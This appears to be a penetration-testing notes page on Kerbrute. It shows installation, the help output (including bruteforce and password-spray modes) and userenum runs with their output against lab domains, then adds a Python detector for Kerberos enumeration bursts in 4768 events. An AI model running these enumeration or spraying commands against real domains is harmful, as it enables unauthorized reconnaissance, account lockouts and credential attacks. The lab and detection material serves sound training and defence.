🖊️ Author: Nairuz Abulhul
🌐 Blog: R3dbuck3t
Tools and Techniques
To install Kerbrute, download the binary from the Kerbrute releases page, pick the latest Linux build (kerbrute_linux_amd64), and make it executable.
$ mv ~/Downloads/kerbrute_linux_amd64 kerbrute
$ chmod +x ./kerbrute
$ ./kerbrute
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/06/23 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
<aside> 💡 When other services (SMB, LDAP, RPC, and so on) give you no usernames, run Kerbrute userenum against a username list: the KDC's Kerberos pre-authentication responses reveal which names are valid domain accounts.
</aside>
$ ./kerbrute userenum --domain htb.local --dc 10.10.10.52 ~/Downloads/wordlists/xato-net-10-million-usernames.txt
2023/05/23 13:45:54 > [+] VALID USERNAME: [email protected]
2023/05/23 13:45:55 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:00 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:05 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:17 > [+] VALID USERNAME: [email protected]
2023/05/23 13:46:41 > [+] VALID USERNAME: [email protected]
2023/05/23 13:47:03 > [+] VALID USERNAME: [email protected]
$ kerbrute userenum users.txt --dc dc01.inlanefreight.local -d inlanefreight.local
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/25/20 - Ronnie Flathers @ropnop
2020/08/25 23:14:51 > Using KDC(s):
2020/08/25 23:14:51 > dc01.inlanefreight.local:88
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > [+] VALID USERNAME: [email protected]
2020/08/25 23:14:51 > Done! Tested 117 usernames (8 valid) in 0.347 seconds
Use Kerbrute in conjunction with the jsmith.txt or jsmith2.txt user lists from Insidetrust.
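On the defender's side, the userenum runs above are visible on the domain controller: every name from the wordlist that does not exist produces a Kerberos TGT request audit (event 4768) with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), all from one client address, in a tight burst. The script below is an added example, not part of these notes or of Kerbrute; it parses a constructed, simplified key=value rendering of such events (the field names follow the 4768 schema, but the one-line format and the sample values are assumptions, not real Windows EVTX output) and flags any source that requests TGTs for at least five distinct unknown principals inside a 60-second sliding window.

```python
"""Flag Kerberos user-enumeration bursts (many unknown principals from one IP)
in simplified 4768 audit records. Added example; the log line format below is
an assumption, not real Windows event log output."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client (10.10.14.7) walking a username list,
# one ordinary workstation (10.10.14.3) with a couple of mistyped names.
SAMPLE_EVENTS = """\
2023-05-23T13:40:00 EventID=4768 TargetUserName=svc_backup IpAddress=10.10.14.3 Status=0x0
2023-05-23T13:41:10 EventID=4768 TargetUserName=jdoe2 IpAddress=10.10.14.3 Status=0x6
2023-05-23T13:45:54 EventID=4768 TargetUserName=aaron IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:54 EventID=4768 TargetUserName=abby IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:55 EventID=4768 TargetUserName=abigail IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:55 EventID=4768 TargetUserName=adam IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:56 EventID=4768 TargetUserName=adrian IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:56 EventID=4768 TargetUserName=alex IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:57 EventID=4768 TargetUserName=alice IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:57 EventID=4768 TargetUserName=alice IpAddress=10.10.14.7 Status=0x6
2023-05-23T13:45:58 EventID=4768 TargetUserName=amanda IpAddress=10.10.14.7 Status=0x6
2023-05-23T14:20:00 EventID=4768 TargetUserName=jdoe IpAddress=10.10.14.3 Status=0x0
2023-05-23T14:25:00 EventID=4768 TargetUserName=jdoe3 IpAddress=10.10.14.3 Status=0x6
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) Status=(?P<status>0x[0-9A-Fa-f]+)$"
)

EVENT_TGT_REQUEST = 4768            # "A Kerberos authentication ticket (TGT) was requested"
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # result code: client not found in Kerberos database


def parse_events(text):
    """Parse the simplified records into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "eid": int(m["eid"]),
            "user": m["user"].lower(),      # AD usernames are case-insensitive
            "ip": m["ip"],
            "status": int(m["status"], 16),
        })
    return events


def detect_enumeration(events, window_seconds=60, min_unknown_users=5):
    """Return {ip: peak} for every source IP that requested TGTs for at least
    `min_unknown_users` distinct non-existent principals inside some sliding
    window of `window_seconds`; `peak` is the largest distinct count observed."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["eid"] == EVENT_TGT_REQUEST and ev["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[ev["ip"]].append(ev)

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        in_window = Counter()   # unknown names currently inside the window, with multiplicity
        left = 0
        peak = 0
        for ev in evs:
            in_window[ev["user"]] += 1
            # Advance the left edge until the window spans at most window_seconds.
            while ev["ts"] - evs[left]["ts"] > window:
                old = evs[left]["user"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_unknown_users:
            alerts[ip] = peak
    return alerts


def describe(alerts):
    """Human-readable alert lines, one per offending source address."""
    return [f"possible Kerberos user enumeration from {ip}: "
            f"{n} distinct unknown principals within the window"
            for ip, n in sorted(alerts.items())]


if __name__ == "__main__":
    for line in describe(detect_enumeration(parse_events(SAMPLE_EVENTS))):
        print(line)
```

Keying on distinct unknown principals rather than on raw failure counts keeps a single user repeatedly mistyping their own name below the threshold, while a wordlist scan, which is mostly names that do not exist, crosses it within seconds. Widening the window catches slower scans at the cost of more noise from ordinary typos, so tune both parameters against a baseline of your own 4768 failure volume.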